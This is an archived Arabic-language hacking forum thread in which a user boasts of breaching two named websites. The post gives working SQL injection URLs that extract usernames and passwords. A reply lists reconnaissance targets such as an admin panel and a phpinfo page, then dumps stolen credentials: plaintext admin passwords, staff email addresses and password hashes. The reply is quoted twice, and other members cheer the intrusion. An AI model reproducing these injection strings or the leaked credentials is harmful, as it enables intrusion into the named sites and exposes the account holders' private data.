:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   اختراق موقعين جديــــد... (http://www.vbspiders.com/vb/showthread.php?t=62887)

AMINE-3d 06-19-2012 12:54 AM
اختراق موقعين جديــــد...
 
تم والحمد لله اختراق موقعين روسيين

1:
كود PHP:
http://www.digitalflywheel.com/case.php?id=-4+union select 1,2,3,4,5,6,7,8,concat_ws%280x3a,username,0x3a,password%29+from+users+limit+1,1 
2:
كود PHP:
http://www.tristihii.ru/news-view.php?ID=9999999 union select 1,2,3,4,group_concat%28username,0x3a,userpass%29+from+poll_user-- 

BackCover 06-19-2012 01:27 AM
رد: اختراق موقعين جديــــد...
 
Bravo broo
continue

qasim 06-19-2012 10:08 AM
رد: اختراق موقعين جديــــد...
 
تسلم يا وحششششش

CODE3 06-20-2012 02:38 PM
رد: اختراق موقعين جديــــد...
 
bien faire

خالد سعودي 06-20-2012 04:01 PM
رد: اختراق موقعين جديــــد...
 
بعد اذن صاحب الموضوع بعد ماشوفت الرابط طلع صفحة في خطا ليس فيها باسبورد
***1054;***1064;***1048;***1041;***1050;***1040;

FATAL_ERROR! news.php: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' union***1042; select***1042; 1,2,3,4,group_concat(username,0x3a,userpass) from poll_user--' at line 1

بنسبة لي الموقع http://www.tristihii.ru/
بعد الفحص
تبين التالي ارجو جمع المعلومات اولا
الوحة التحكم
http://www.tristihii.ru/feedback/admin/
معلومات PHP Version 5.2.14 تفيدك كثير
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/icons/
http://www.tristihii.ru/robots.txt
Server: Apache
اسم القاعدة digital_dfw الجدول ssp2g_admins العمود username,password,email
النتيجة
[1] admin:dpc1s3@rch:jrigby@databasepublish.com:
[2] jbachana:biggie:joseph.bachana@databasepublish.com :
حولت ادخل لكن خطا ؟ نكمل على الموقع
اسم القاعدة digital_dfw الجدول users العمود username,password
النتيجة
[1] jbachana:e41d813551123414059fdc0d0c0eab8a:
[2] yevgeniy:e41d813551123414059fdc0d0c0eab8a:
[3] jtohfafarosh:31319e71736e81f80db023c40a2f9e85:
[4] tgardner:caf2514afe5ff1487452d38fa64e8135:
حولت فك الباسبود مافك معي ؟ على السريع
فمان الرحمن
تضامن مع الشعب السوري الحر

AMINE-3d 06-21-2012 04:24 AM
رد: اختراق موقعين جديــــد...
 
اقتباس:
المشاركة الأصلية كتبت بواسطة خالد سعودي (المشاركة 439500)
بعد اذن صاحب الموضوع بعد ماشوفت الرابط طلع صفحة في خطا ليس فيها باسبورد
***1054;***1064;***1048;***1041;***1050;***1040;

FATAL_ERROR! news.php: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' union***1042; select***1042; 1,2,3,4,group_concat(username,0x3a,userpass) from poll_user--' at line 1

بنسبة لي الموقع http://www.tristihii.ru/
بعد الفحص
تبين التالي ارجو جمع المعلومات اولا
الوحة التحكم
http://www.tristihii.ru/feedback/admin/
معلومات PHP Version 5.2.14 تفيدك كثير
http://www.tristihii.ru/phpinfo.php
http://www.tristihii.ru/icons/
http://www.tristihii.ru/robots.txt
Server: Apache
اسم القاعدة digital_dfw الجدول ssp2g_admins العمود username,password,email
النتيجة
[1] admin:dpc1s3@rch:jrigby@databasepublish.com:
[2] jbachana:biggie:joseph.bachana@databasepublish.com :
حولت ادخل لكن خطا ؟ نكمل على الموقع
اسم القاعدة digital_dfw الجدول users العمود username,password
النتيجة
[1] jbachana:e41d813551123414059fdc0d0c0eab8a:
[2] yevgeniy:e41d813551123414059fdc0d0c0eab8a:
[3] jtohfafarosh:31319e71736e81f80db023c40a2f9e85:
[4] tgardner:caf2514afe5ff1487452d38fa64e8135:
حولت فك الباسبود مافك معي ؟ على السريع
فمان الرحمن
تضامن مع الشعب السوري الحر
الله يحفضك اخي على المعلومات لكن انا عندي وقت طويل غايب عن الميدان ساسترجع هذه الايام ...


الساعة الآن 04:55 AM


[ vBspiders.Com Network ]